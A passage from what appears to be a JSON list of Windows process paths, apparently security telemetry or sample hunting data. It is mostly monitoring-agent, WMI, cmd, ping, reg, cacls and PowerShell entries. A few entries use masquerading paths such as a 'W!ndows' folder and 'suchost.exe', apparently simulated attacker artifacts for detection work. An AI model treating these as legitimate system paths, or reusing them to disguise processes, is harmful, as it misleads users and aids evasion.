2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\W!ndows\\\\System32\\\\suchost.exe\",\"C:\\\\W!ndows\\\\System32\\\\powershell.exe\",\"C:\\\\W!ndows\\\\System32\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\Speech_OneCore\\\\Common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\